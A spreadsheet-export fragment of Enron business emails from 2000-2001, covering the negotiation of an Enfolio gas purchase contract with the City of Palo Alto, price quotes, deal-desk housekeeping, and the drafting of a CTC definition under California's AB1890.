    <t>Attached is a letter from SoCalGas to the service list in the Gas Industry _x000D_
Restructuring Proceeding regarding Altra Energy Technologies (Altra).? Also, _x000D_
a hard copy is being mailed today._x000D_
_x000D_
??????? ???????  &lt;&lt;GIR-Altra Announcement1.doc&gt;&gt; _x000D_
_x000D_
 - GIR-Altra Announcement1.doc</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 07:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'grant_kolling@city.palo-alto.ca.us'})</t>
  </si>
  <si>
    <t>frozenset({'grant_kolling@city.palo-alto.ca.us', 'dan.j.hyvl@enron.com'})</t>
  </si>
  <si>
    <t>RE: Enfolio Master Firm Purchase/Sale Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Dan, I offer my apologies once again for the delayed response.  It would be_x000D_
nice if the California energy crisis would evaporate the away gas vaporizes_x000D_
under normal atmospheric conditions, so that my work load could ease_x000D_
dramatically.  But, no such luck._x000D_
_x000D_
With respect to your modifications to 4.2(iv)(b), 4.2(v), (4.2((vi), the_x000D_
definition of "Act", the changes to "Arbitration Disputes to be Arbitrated",_x000D_
they are acceptable.  However, at the risk of being a nitpicker, the word_x000D_
"parties" in the language added to the "Arbitration Disputes to be_x000D_
Arbitrated" paragraph should read "Parties."_x000D_
_x000D_
Also, on or before the Effective Date, it would be appreciated if the City_x000D_
could receive a list of the initial contact staff members of Enron who are_x000D_
located on the trade floor._x000D_
_x000D_
For your information, the certified copy of the resolution no. 8040, adopted_x000D_
March 12, 2001 by the city council, authorizing the city manager to sign the_x000D_
Enfolio contract, will be delivered in the very near future.  I could fax to_x000D_
you as soon as I get a fax number.  Please omit the draft resolution and the_x000D_
deleted opinion of counsel in the final dispatch to me.  If the red-line and_x000D_
strike-out changes [introductory paragraph, 4.2(iv)(b), 4.2(v) and (vi),_x000D_
Act, Arbitration Disputes to be Arbitrated] could be removed, that would be_x000D_
great._x000D_
_x000D_
The City has another inquiry.  The OFO language on page 2 of Appendix "1"_x000D_
suggests that Enron is not responsible for OFO-related charges if it doesn't_x000D_
receive properly or timely notice of an OFO condition.  Is this so?_x000D_
Further, under what conditions would the City be required to give Enron_x000D_
notice of an OFO?  Finally, EFOs are not addressed in this contract.  Do the_x000D_
words "or other order or notice from a Transporter" in the Operational Flow_x000D_
Orders paragraph contemplate EFOs?_x000D_
_x000D_
I'm optimistic that we can wrap this up pretty soon.  Look forward to your_x000D_
response to this e-mail.  Thanks, Grant._x000D_
_x000D_
-----Original Message-----_x000D_
From: Dan.J.Hyvl@enron.com [mailto:Dan.J.Hyvl@enron.com]_x000D_
Sent: Thursday, March 22, 2001 2:36 PM_x000D_
To: grant_kolling@city.palo-alto.ca.us_x000D_
Cc: Kim.Ward@enron.com_x000D_
Subject: RE: Enfolio Master Firm Purchase/Sale Agreement_x000D_
_x000D_
_x000D_
_x000D_
Grant,_x000D_
     Sorry for the delay in responding to your additional inquiries._x000D_
     7.   Re 4.2(iv)(b) - I would propose the clause to read:  "(b) file a_x000D_
petition or otherwise commence, authorize or acquiesce in the commencement_x000D_
of a proceeding or cause under any bankruptcy or similar law of the_x000D_
protection of creditors, or have such petition filed against it and such_x000D_
proceeding remains undismissed for 30 Days, provided if a petition is filed_x000D_
against the Affected Party and the  Affected Party is actively pursuing all_x000D_
steps to have such proceeding dismissed and provides the other party with_x000D_
reasonable documentation supporting its actions to cause such proceeding to_x000D_
be dismissed, then such Affected Party shall have an additional 30 Days to_x000D_
effectuate such dismissal,"_x000D_
     8.   Re 4.2 (v) and 4.2 (vi) -  "20 or more Gas Days" is acceptable._x000D_
     13.  I will change the definition of "Act" as you suggest._x000D_
     21.  I propose that language be added whereby the parties shall first_x000D_
attempt to settle the matters to be resolved by the use of binding_x000D_
Arbitration by mon-binding mediation and if that does not resolve the issue_x000D_
to the satisfaction of the parties, such matter shall thereafter be_x000D_
resolved by the use of binding Arbitration.  Is this an acceptable_x000D_
resolution?_x000D_
     22.  We cannot agree to any list of parties who are authorized to_x000D_
enter into transactions under the contract.  Our position is that whoever_x000D_
answers the trading phone during trading hours is authorized to bind the_x000D_
company.  However, we will provide the City with an initial contact list of_x000D_
the people on the trading floor whom the city can contact as of the date_x000D_
the contract is signed; however, the persons who are authorized to enter_x000D_
into a transaction with the city will not be limited to the initial contact_x000D_
list.  Of course, the city could always attempt to contact someone on the_x000D_
initial contact list.  Will an initial contact list be acceptable?_x000D_
_x000D_
Please let me have your thoughts concerning the above._x000D_
                                                   Dan._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    "Kolling, Grant"_x000D_
_x000D_
                    &lt;grant_kolling@city.palo-a        To:_x000D_
"'Dan.J.Hyvl@enron.com'"_x000D_
                    lto.ca.us&gt;                        &lt;Dan.J.Hyvl@enron.com&gt;_x000D_
_x000D_
                                                      cc:_x000D_
_x000D_
                    03/16/2001 05:09 PM               Subject:     RE:_x000D_
Enfolio Master Firm_x000D_
                                                      Purchase/Sale_x000D_
Agreement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dan, please accept my apologies for replying so late.  I was out of town_x000D_
again, and am back at trying to complete 5+ days of work within 3 days._x000D_
_x000D_
Thanks for accepting a lot of our requests.  Let me follow up with a couple_x000D_
of additional inquiries._x000D_
_x000D_
7.  Re 4.2(iv), please suggest language as you've indicated in sentence 2._x000D_
Anything along the lines you've proposed likely will be agreeable._x000D_
_x000D_
8.  Re 4.2(v) and (vi).  How about 20 days?_x000D_
_x000D_
13. Definition of "Act."  I suggest you refer to Article 11, sections 5 and_x000D_
9 of the California Constitution, to be more specific.  Section 3 is not_x000D_
regularly cited as the line of authority to the best of my knowledge,_x000D_
though_x000D_
I can see how the language could lead  one to cite it._x000D_
_x000D_
21.  In California, the concept of binding mediation is not recognized, if_x000D_
I_x000D_
have understood our outside counsel at prior mediations in which I've_x000D_
participated.  Mediation is non-binding.  As a practical matter, it can_x000D_
cost_x000D_
almost as much in terms of time, money and effort to proceed to mediation,_x000D_
but the "rules of engagement" are not as tight as are found in arbitration._x000D_
We avoid the rigid procedures.  I believe Enron should consider this_x000D_
approach at times.  Having gone through a couple, I would not recommend to_x000D_
my client that we would proceed any further once the mediator makes a_x000D_
proposal that's acceptable to the parties.  The cost of arbitration is not_x000D_
worth it.  That's why we in California tend to prefer mediation to_x000D_
arbitration._x000D_
_x000D_
22.  I have to insist on behalf of my client that we assemble some list._x000D_
Surely, Enron can submit a list of people that will be initially approved_x000D_
to_x000D_
engage in authorized transactions.  We can do the same.  We've had an_x000D_
unfavorable experience with another Texas-based_x000D_
energy company regarding the scope of its representative's authority.  We_x000D_
don't want to litigate the issue of due authority.  That list would help_x000D_
It's not a matter of the city claiming the authority to back out of the_x000D_
contract, because someone arguably didn't have the authority.  There are a_x000D_
ton of cases which would make it extremely difficult to make that claim._x000D_
_x000D_
Thanks.  Grant._x000D_
          -----Original Message-----_x000D_
          From:     Dan.J.Hyvl@enron.com [mailto:Dan.J.Hyvl@enron.com]_x000D_
          Sent:     Thursday, March 08, 2001 3:13 PM_x000D_
          To:  grant_kolling@city.palo-alto.ca.us_x000D_
          Cc:  Kim.Ward@enron.com_x000D_
          Subject:  RE: Enfolio Master Firm Purchase/Sale_x000D_
Agreement_x000D_
_x000D_
           &lt;&lt; File: 2001-002ctr.doc &gt;&gt; &lt;&lt; File: 0071988 RESO Enron.doc_x000D_
&gt;&gt;_x000D_
          (See attached file: 2001-002ctr.doc)_x000D_
_x000D_
          Grant,_x000D_
               I have reviewed your requested changes and have made_x000D_
the changes which_x000D_
          do not require explanation or clarification.  Those changes_x000D_
are reflected_x000D_
          in the above document.  Let me go over your list of items:_x000D_
               1.   I have deleted the word "DRAFT"._x000D_
               2.   I have left a blank for the date within the month_x000D_
of March 2001_x000D_
          when the contract would be executed by the City._x000D_
               3.   I have changed the word "may" to "shall"._x000D_
               4.   Maximum Daily Delivery Point Quantity does not fit_x000D_
in a_x000D_
          Deficiency Default, it is just the maximum quantity that can_x000D_
be handled by_x000D_
          a party at a particular point.  I do not think their is an_x000D_
omission._x000D_
               5.   I have added the word "reasonable"._x000D_
               6.   The procedue for how the Termination Payment is_x000D_
determined is_x000D_
          provided, if the City disagrees with the method and values_x000D_
provided in the_x000D_
          statement and is unable to convince the Company to revise,_x000D_
the statement,_x000D_
          then the issue is to be resolved in arbitration.  At the_x000D_
point that a_x000D_
          Termination Payment calculation is necessary, a long drawn_x000D_
out period_x000D_
          should not be necessary to attain closure._x000D_
               7.   We need to limit the duration to 30 days,  neither_x000D_
party should_x000D_
          be required to wait 60 days before it could accelerate the_x000D_
other party's_x000D_
          obligations under the Contract.  We might be able to add_x000D_
language to extend_x000D_
          the period if we had some documentation stating the steps_x000D_
that a party was_x000D_
          pursuing to cause the proceeding to be dismissed and the_x000D_
other party was_x000D_
          otherwise kept whole from a credit exposure._x000D_
               8.   I have kept the 30 days because 5 days is too_x000D_
short a period._x000D_
          During a holiday period, one scheduling error could cover_x000D_
the entire_x000D_
          period.  Article 3 has language which provides a remedy for_x000D_
a party if a_x000D_
          scheduling default extends for more than 5 days during any_x000D_
month._x000D_
               9.   The reason is because Enron Corp. is the rated_x000D_
entity and no_x000D_
          separate rating applies to ENA._x000D_
               10.  I have changed "a" to "the"_x000D_
               11.  I have eliminated the  60 day limitation on the_x000D_
duration of an_x000D_
          event of Force Majeure._x000D_
               12.  This merely addressed the possibility of a_x000D_
imbalance amount being_x000D_
          due when a pipeline aggregates imbalances using multiple_x000D_
points, and the_x000D_
          language would allocated the payment based on the amount of_x000D_
the imbalance_x000D_
          that a particular party may have caused.  I think the_x000D_
language is clear as_x000D_
          written._x000D_
               13.  The definition of Act was one of the items that I_x000D_
had requested_x000D_
          that you review and complete as necessary so that all_x000D_
appropriate statutes_x000D_
          were referenced.  I am still waiting for your language.  I_x000D_
started filling_x000D_
          it in using language that had been provided by the City._x000D_
               14.  I added the word "reasonable"._x000D_
               15.  I have made the requested change relating to_x000D_
GAAAP._x000D_
               16.  This is a late payment provision and as such a_x000D_
believe that the_x000D_
          provision should be more than a party's rating, as such I_x000D_
have kept the 2%_x000D_
          over prime language._x000D_
               17.  These amounts were determined by the credit group_x000D_
and any change_x000D_
          needs to be discussed with that group.  BBB-  is considered_x000D_
investment_x000D_
          grade and I understand that Enron Corp.'s rating is BBB._x000D_
ENA is not a_x000D_
          rated entity and that is why the language relates to Enron_x000D_
Corp.'s rating._x000D_
               18.  The elimination of the opinion of counsel did not_x000D_
change the_x000D_
          requirements relating to the representations that we expect_x000D_
the City to_x000D_
          have made.  If the City cannot make these representations,_x000D_
then we need to_x000D_
          know that before we execute the Contract._x000D_
               19.  I have added the word "reasonable"._x000D_
               20.  The party that has the Transport Agreement with_x000D_
the Transporter_x000D_
          should have the legal right to obtain the information based_x000D_
on its_x000D_
          contract._x000D_
               21.  It is our position that any dispute be arbitrated._x000D_
We can agree_x000D_
          to meditation if we can make the outcome binding on the_x000D_
parties.  I am_x000D_
          willing to discuss any changed language that you might care_x000D_
to offer._x000D_
               22.  We have found that personnel of both our Company_x000D_
and that of our_x000D_
          Customers change so rapidily that the list is not workable_x000D_
and merely_x000D_
          allows a party to back out of transactions it does not like_x000D_
on the basis_x000D_
          that the person who agreed to such transaction was not on_x000D_
the list._x000D_
          Therefore , we object to any listing of approved parties who_x000D_
can transact._x000D_
          We believe that each party should be responsible for the_x000D_
actions of its_x000D_
          employees and should stand behind any transactions that_x000D_
those parties may_x000D_
          enter into pursuant to the terms and provisions of the_x000D_
Contract._x000D_
_x000D_
               I will be out of the office on Friday, but will be in_x000D_
all next week if_x000D_
          you care to discuss any of these matters._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                              "Kolling, Grant"_x000D_
_x000D_
                              &lt;grant_kolling@city.palo-a        To:_x000D_
"'Dan.J.Hyvl@enron.com'"_x000D_
                              lto.ca.us&gt;_x000D_
&lt;Dan.J.Hyvl@enron.com&gt;, "Kolling, Grant"_x000D_
_x000D_
&lt;grant_kolling@city.palo-alto.ca.us&gt;_x000D_
                              03/02/2001 03:43 PM               cc:_x000D_
Kim.Ward@enron.com_x000D_
_x000D_
Subject:     RE: Enfolio Master Firm_x000D_
_x000D_
Purchase/Sale Agreement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
           &lt;&lt;0071988 RESO Enron.doc&gt;&gt;_x000D_
_x000D_
          Dan:_x000D_
_x000D_
          First, I've attached the proposed resolution which_x000D_
authorizes the City_x000D_
          Manager to execute the Enfolio agreement._x000D_
_x000D_
          More importantly, I need to inform you that our senior_x000D_
management has_x000D_
          reviewed the referenced contract; I have been asked to_x000D_
present additional_x000D_
          changes to the agreement for Enron's consideration and to_x000D_
raise questions_x000D_
          about certain of its terms and conditions._x000D_
_x000D_
          Let me start from page 1, top to bottom, and proceed to the_x000D_
end of the_x000D_
          exhibits._x000D_
_x000D_
          1.  There is the word "DRAFT" above the title of the Enfolio_x000D_
agreement_x000D_
          which_x000D_
          should be deleted._x000D_
_x000D_
          2.  The introductory paragraph, line 5, should not contain_x000D_
the words "1st_x000D_
          of_x000D_
          January, 2001."  It should be left blank, until the parties_x000D_
have signed the_x000D_
          contract.  Otherwise, the City will be in breach as of the_x000D_
date it signs_x000D_
          the_x000D_
          contract, because Article 2, section 2.1 requires the City_x000D_
to proffer the_x000D_
          to-be-approved-by-Council resolution as of 1/1/01._x000D_
_x000D_
          3.  Article 2, Section 2.4, line 2.  The City (Customer)_x000D_
wants Enron_x000D_
          (Company) to confirm every recorded telephonic Transaction,_x000D_
as defined._x000D_
          Therefore, the City requests the word "may" should be_x000D_
changed to "shall."_x000D_
_x000D_
          4.  Article 3, Sections 3.1 and 3.2, first sentence:_x000D_
Buyer's Requested_x000D_
          Quantity refers to the DCQ or MaxDQ.  Seller's failure to_x000D_
Schedule the_x000D_
          Buyer's Requested Quantity shall constitute a Seller's_x000D_
Deficiency Default._x000D_
          How does a Maximum Daily Delivery Point Quantity fit into a_x000D_
Seller's_x000D_
          Deficiency Default if the Buyer's Requested Quantity does_x000D_
not include a_x000D_
          Maximum Daily Delivery Point Quantity?  What is the reason_x000D_
for the_x000D_
          omission?_x000D_
_x000D_
          5.  Article 4, Section 4.1, lines 15 and 23:  Line 23 refers_x000D_
to "reasonable_x000D_
          attorneys' fees" yet line 15 refers to "attorneys' fees."_x000D_
To be internally_x000D_
          consistent, line 15 should say "reasonable attorneys' fees."_x000D_
_x000D_
          6.  Section 4.1, right hand column, lines 3-4.  A statement_x000D_
showing the_x000D_
          determination of the Termination Payment will be prepared._x000D_
It's unclear_x000D_
          whether the City is entitled to review and challenge the_x000D_
determination_x000D_
          before a dispute is referred to arbitration.  The City_x000D_
should be entitled_x000D_
          to_x000D_
          receive a copy of the determination and to question it_x000D_
before it is_x000D_
          obligated to pay the Termination Payment.  Please clarify,_x000D_
or permit the_x000D_
          City to exercise these rights._x000D_
_x000D_
          7.  Section 4.2(iv) specifies that a Triggering Event will_x000D_
exist if a_x000D_
          bankruptcy petition is undismissed within 30 days.  Is this_x000D_
(under_x000D_
          bankruptcy laws) the minimum period of time within which one_x000D_
may seek_x000D_
          dismissal of a bankruptcy petition?  Please refer to the 11_x000D_
USC section_x000D_
          that_x000D_
          backs up this provision, or change to 60 days._x000D_
_x000D_
          8.  Section 4.2(v) and (vi):  Please change "30 days" to "5_x000D_
days."  The_x000D_
          City_x000D_
          is concerned with the number of days that Enron may be_x000D_
permitted to fail to_x000D_
          Schedule before a Triggering Event is triggered by Enron._x000D_
_x000D_
          9.  Section 4.2(ix):  this language discusses a default by_x000D_
Enron Corp._x000D_
          (ENA's parent?), but no mention is made of ENA's default in_x000D_
this regard?_x000D_
          Please explain._x000D_
_x000D_
          10. Section 4.5, line 4:  Is "a Company" supposed to refer_x000D_
to "the Company"_x000D_
          ?_x000D_
_x000D_
          11. Article 5.  The City is uncomfortable with the force_x000D_
majeure provision_x000D_
          as drafted.  It states that the parties must perform even if_x000D_
a FM event_x000D_
          (earthquake) would prevent either or both parties from_x000D_
performing with the_x000D_
          60-day period stated therein.  There is no such limitation_x000D_
under California_x000D_
          law in the absence of a contract provision to the contrary._x000D_
_x000D_
          12.  Article 7, Section 7.2:  Could Enron translate the last_x000D_
sentence?  We_x000D_
          don't understand it._x000D_
_x000D_
          13.  Appendix "1":  Act:  Please explain why Section 3 is_x000D_
referred to?_x000D_
_x000D_
          14.  Appendix "1", Claims, line 4:  Please add "reasonable"_x000D_
before_x000D_
          "attorneys' fees._x000D_
_x000D_
           15.  Appendix "1", GAAP:  This should read: "GAAP means_x000D_
generally accepted_x000D_
          accounting principles, consistently applied, with respect to_x000D_
Company, and_x000D_
          governmental generally accepted accounting principles,_x000D_
consistently_x000D_
          applied,_x000D_
          with respect to Customer."_x000D_
_x000D_
          16.  Appendix "1", Interest Rate:  Please delete "two_x000D_
percent over".  The_x000D_
          City has a AAA bond rating, therefore, the  City believes_x000D_
the 2% over prime_x000D_
          should not apply to it._x000D_
_x000D_
          17.  Appendix "1", Material Adverse Change:  What does Enron_x000D_
believe the_x000D_
          City's Net Worth to be?  The $400 million threshold is_x000D_
mentioned.  Also,_x000D_
          what is ENA's bond rating?  Is "BBB-" an investment grade_x000D_
rating?_x000D_
_x000D_
          18.  Representations and Warranties:  Because we have agreed_x000D_
that the_x000D_
          opinion of counsel will not be required, the reps and_x000D_
warranties are being_x000D_
          deleted.  But the "Representations and Warranties" is_x000D_
nevertheless included_x000D_
          in the agreement.  Item (i) should be deleted, because the_x000D_
City has not_x000D_
          undertaken a court search as is our custom and practice_x000D_
whenever we issue_x000D_
          an_x000D_
          opinion.  We would like to delete "and (vii) it is not ..._x000D_
Party."_x000D_
_x000D_
          19.  Operational Flow Orders, line 8:  Please add_x000D_
"reasonable" before_x000D_
          "attorneys' fees."_x000D_
_x000D_
          20.  Financial Matters, line 8:  What is meant by "to the_x000D_
extent it has a_x000D_
          legal right of access thereto and/or ...etc."_x000D_
_x000D_
          21.  Arbitration, Disputes to be Arbitrated.  We do not as a_x000D_
matter of_x000D_
          legal_x000D_
          policy agree to arbitration, but we will mediate disputes._x000D_
Is Enron_x000D_
          amenable to mediation?  This process is less formal and less_x000D_
costly in my_x000D_
          opinion._x000D_
_x000D_
          22.  Authority for Transactions.  Staff would like the_x000D_
Agreement to include_x000D_
          a list of employees for Company and Customer who are_x000D_
authorized to trade on_x000D_
          behalf of their employers.  Could a statement be added to_x000D_
this section to_x000D_
          this effect?  Then, we could attach the list(s) as an_x000D_
Exhibit C._x000D_
_x000D_
          Thank you so much for considering these issues.  There are_x000D_
others which I_x000D_
          hope to receive from staff next week and which I will_x000D_
forward to you for_x000D_
          response._x000D_
_x000D_
          Look forward to hearing from you soon.  I will be out of_x000D_
town after today_x000D_
          until Wednesday, March 7._x000D_
_x000D_
          Sincerely,_x000D_
_x000D_
          Grant Kolling_x000D_
                    -----Original Message-----_x000D_
                    From:     Dan.J.Hyvl@enron.com_x000D_
[mailto:Dan.J.Hyvl@enron.com]_x000D_
                    Sent:     Tuesday, February 27, 2001 6:16 AM_x000D_
                    To:  grant_kolling@city.palo-alto.ca.us_x000D_
                    Cc:  Kim.Ward@enron.com_x000D_
                    Subject:  Re:  Enfolio Master Firm Purchase/Sale_x000D_
          Agreement_x000D_
_x000D_
                     &lt;&lt; File: 2001-002ctr.doc &gt;&gt;_x000D_
                    (See attached file: 2001-002ctr.doc)_x000D_
_x000D_
                    Grant,_x000D_
                         I have incorporated the language you provided_x000D_
to me in_x000D_
          the attached_x000D_
                    document.  I have been informed by the Corporate_x000D_
Secretary's_x000D_
          office that_x000D_
                    they will issue a Certificate of Incumbency_x000D_
showing that the_x000D_
          person_x000D_
                    executing the contract for ENA is authorized to_x000D_
execute_x000D_
          contracts for ENA._x000D_
                    No other party signs as to form or terms, however,_x000D_
the_x000D_
          officer executing_x000D_
                    for ENA will require that the deal person and I_x000D_
initial on_x000D_
          the line next to_x000D_
                    his signature.  I have reviewed the proposed draft_x000D_
          resolution.  ENA will_x000D_
                    accept the enacted resolution and will not require_x000D_
that the_x000D_
          City Attorney_x000D_
                    issue an opinion.  If the attached contract is_x000D_
acceptable,_x000D_
          please print off_x000D_
                    2 originals, have them approved, signed and_x000D_
forward to me_x000D_
          for ENA's_x000D_
                    approval and signature.  Once the contract is_x000D_
fully_x000D_
          executed, I will return_x000D_
                    one fully executed original to you for the City's_x000D_
file._x000D_
_x000D_
          (See attached file: 0071988 RESO Enron.doc)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 04:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'monica_padilla@city.palo-alto.ca.us'})</t>
  </si>
  <si>
    <t>RE: price quotes</t>
  </si>
  <si>
    <t>Thanks Kim.  It would be great if you could see these to me daily.  I use_x000D_
the information for two purposes: 1) to run our portfolio VaR and_x000D_
Mark-to-market numbers, and 2) to have an indication of where the market is_x000D_
going._x000D_
_x000D_
Our attorney has contacted me to let me know that he is reviewing the_x000D_
Enfolio._x000D_
_x000D_
Monica_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kim.Ward@enron.com [mailto:Kim.Ward@enron.com]_x000D_
Sent: Monday, January 22, 2001 8:45 AM_x000D_
To: monica_padilla@city.palo-alto.ca.us_x000D_
Subject: price quotes_x000D_
_x000D_
_x000D_
Monica,_x000D_
_x000D_
Attached are some VERY rough prices for 1,2,3 and 5 years out at Malin and_x000D_
City Gate.   I am still working on access to the programs for options as_x000D_
well as more ACCURATE prices.  I know you are just trying to get a feel for_x000D_
what the market looks like right now so this should be good for that._x000D_
_x000D_
Also, it looks like we don't have a master agreement in place with NCPA_x000D_
which would govern gas transactions.  Those transactions would be done_x000D_
under the General Terms &amp; Conditions as well.  Did you get a copy of those?_x000D_
I am following up on getting you a Master Agreement as well as an ISDA and_x000D_
will keep you posted._x000D_
_x000D_
Call me if you have questions or need more info!!_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kim_x000D_
_x000D_
(See attached file: Continuous_price_quotes.xls)</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 00:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'thomas.engel@enron.com'})</t>
  </si>
  <si>
    <t>Re: ECT - IM WAHA ???</t>
  </si>
  <si>
    <t xml:space="preserve">All except for last one rollled due to evergreen.  When you convert to ENA - _x000D_
IM Texas - don't forget to remove the evergreen flag on the old ECT - IM Waha _x000D_
deals._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Thomas Engel/HOU/ECT on 08/29/2000 07:24 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Daren J Farmer_x000D_
08/22/2000 12:45 PM_x000D_
To: Thomas Engel/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: ECT - IM WAHA ???  _x000D_
_x000D_
These deals should be converted to ENA-IM Texas.  Is there a way that you can _x000D_
change all of these deals systematically?_x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Thomas Engel                           08/22/2000 08:54 AM_x000D_
	_x000D_
_x000D_
To: Daren J Farmer/HOU/ECT@ECT, Heidi Withers/HOU/EES@EES, Trisha _x000D_
Hughes/HOU/ECT@ECT_x000D_
cc: Rita Wynne/HOU/ECT@ECT, Russ Severson/HOU/ECT@ECT, Scott _x000D_
Mills/HOU/ECT@ECT, Regina Perkins/HOU/ECT@ECT _x000D_
Subject: ECT - IM WAHA ???_x000D_
_x000D_
_x000D_
Should these not be converted to ENA - IM Texas ???  Some time ago - we were _x000D_
told this desk was dead and the existing deals would end.  This desk is not _x000D_
included in any Texas desk portfolios._x000D_
_x000D_
The ECT desks are supposed to be inactive - however - these deals keep _x000D_
rolling - and _x000D_
someone created some new ones?   If the desk is active - should we change it _x000D_
to ENA - IM Waha - _x000D_
as ECT is no more ???_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 07:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'edwin.essandoh@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'andrew.wu@enron.com', 'roger.yang@enron.com'})</t>
  </si>
  <si>
    <t>Re: CTC definition</t>
  </si>
  <si>
    <t xml:space="preserve">As a suggestion for the discussion on Thursday, if the entire purpose of=20_x000D_
resolving the "Residual CTCs" definition is to make sure that Pre-Rolloff=_x000D_
=20_x000D_
Period does not extend beyond a date certain, can we not leave out the=20_x000D_
reference to residual CTC's and just focus on a hard date, as in eg:_x000D_
_x000D_
_x000D_
  =01&amp;Pre-Rolloff Period=018 shall mean, with respect to each Facility, the=_x000D_
 period=20_x000D_
of time commencing with the Effective Date and ending on      the last day=_x000D_
=20_x000D_
the UDC for such Facility is authorized to collect CTCs in it service=20_x000D_
territory, all as specifically provided for in AB1890 as in effect on the  =_x000D_
 =20_x000D_
Effective Date (and exclusive of subsequent amendments thereto after said=_x000D_
=20_x000D_
date), provided that, in any event, the Pre-Rolloff Period shall not=20_x000D_
extend    beyond March 2002._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
=09Enron Energy Services_x000D_
=09_x000D_
=09From:  Andrew Wu                           10/25/2000 08:19 AM_x000D_
=09Phone No: 713 853-0504_x000D_
=09_x000D_
_x000D_
_x000D_
_x000D_
To: Susan J Mara/SFO/EES@EES, Jeff Dasovich/NA/Enron@Enron, Mona L=20_x000D_
Petrochko/NA/Enron@Enron_x000D_
cc: Edwin Essandoh/HOU/EES@EES, Tim Carter/HOU/EES@EES=20_x000D_
Subject: Re: CTC definition_x000D_
_x000D_
Sue, Mona, and Dasovich--_x000D_
_x000D_
Would one of you be available for about 30 mins or so tomorrow p.m. (Thurs)=_x000D_
=20_x000D_
to square away this issue (maybe around 3 or 4 or so)?  My recollection of=_x000D_
=20_x000D_
our original contract language was to capture all of the post-transition=20_x000D_
period CTCs as set forth in AB1890, so maybe we just need to broaden or=20_x000D_
clarify what we mean by "residual CTCs".  I'll actually be at 101 Cal=20_x000D_
starting in the p.m. tomorrow, so this could work out pretty well. =20_x000D_
Otherwise, I'll be in SR on Friday and then in SoCal next week but back in=_x000D_
=20_x000D_
SFO on next Weds for a two day LSI seminar (Dasovich you're speaking at it?=_x000D_
)=20_x000D_
Thurs and Fri so we could discuss then too._x000D_
_x000D_
Sorry for the short notice and I hope I'll at least be able to say hi to=20_x000D_
everyone tomorrow._x000D_
_x000D_
Andy_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Andrew Wu/HOU/EES on 10/25/2000 08:14 A=_x000D_
M=20_x000D_
---------------------------_x000D_
_x000D_
_x000D_
Edwin Essandoh_x000D_
10/24/2000 02:41 PM_x000D_
To: Tim Carter/HOU/EES@EES, Andrew Wu/HOU/EES@EES_x000D_
cc: =20_x000D_
Subject: Re: CTC definition_x000D_
_x000D_
Sorry Guys, should have cc'd you._x000D_
_x000D_
Ed_x000D_
---------------------- Forwarded by Edwin Essandoh/HOU/EES on 10/24/2000=20_x000D_
02:40 PM ---------------------------_x000D_
_x000D_
_x000D_
Edwin Essandoh_x000D_
10/24/2000 02:27 PM_x000D_
To: Roger Yang/SFO/EES@EES, Susan J Mara/SFO/EES@EES, Jeff=20_x000D_
Dasovich/NA/Enron@Enron, Mona L Petrochko/NA/Enron@Enron_x000D_
cc: =20_x000D_
Subject: Re: CTC definition =20_x000D_
_x000D_
Roger,=20_x000D_
Thanks for the input.  It does need some refinement.  For that matter, do y=_x000D_
ou=20_x000D_
consider the definition of "CTC charges" adequate?  Andy Wu is going to be =_x000D_
in=20_x000D_
San Francisco on Thursday, and has agreed to discuss the language with Susa=_x000D_
n,=20_x000D_
Jeff and/or Mona in Gov't Affairs._x000D_
_x000D_
Ed_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Roger Yang_x000D_
10/24/2000 01:19 PM_x000D_
To: Edwin Essandoh/HOU/EES@EES_x000D_
cc: Susan J Mara/SFO/EES@EES, Jeff Dasovich/NA/Enron@Enron, Mona Petrochko=_x000D_
=20_x000D_
Subject: Re: Contract for Gart Sports =20_x000D_
_x000D_
Attached is a version of AB1890.  I refer you to pages 31 through 36 which=_x000D_
=20_x000D_
discusses Sections 367 through 368._x000D_
_x000D_
Residual CTCs may have two connotations.  The first connotation is the type=_x000D_
=20_x000D_
of CTC recovery during the rate freeze period.  For example, the California=_x000D_
=20_x000D_
IOUs bill customers based on frozen rates.  From those frozen rates, delive=_x000D_
ry=20_x000D_
and procurement costs are subtracted.  What is left over residually is the=_x000D_
=20_x000D_
recovery of CTCs.  The interpretation that you are implementing is the CTCs=_x000D_
=20_x000D_
that are recovered after the frozen rate period.  Due to these two possible=_x000D_
=20_x000D_
interpretations, I believe that either the term "residual CTCs" needs to be=_x000D_
=20_x000D_
defined or a better definition of the "Pre-Rolloff Period" and "Post-Rollof=_x000D_
f=20_x000D_
Period."_x000D_
_x000D_
After reading the cites that I referred to above, if you believe the=20_x000D_
definition incorporates the guidelines implemented through Sections 367 and=_x000D_
=20_x000D_
368, then I will be comfortable with the current language.  My concern was=_x000D_
=20_x000D_
that the CPUC may adopt changes to the recovery plan per Section 368 that=_x000D_
=20_x000D_
would disadvantage ESPs and DA customers, and only benefit and protect=20_x000D_
Standard Offer customers.  Pursuant to Section 368, the IOUs implemented co=_x000D_
st=20_x000D_
recovery plans to recover costs that meet the criteria in Section 367.  I a=_x000D_
m=20_x000D_
worried that customers may be confused by plans that may be implemented in =_x000D_
a=20_x000D_
the Post-Rolloff periods that may look like the original cost recovery plan=_x000D_
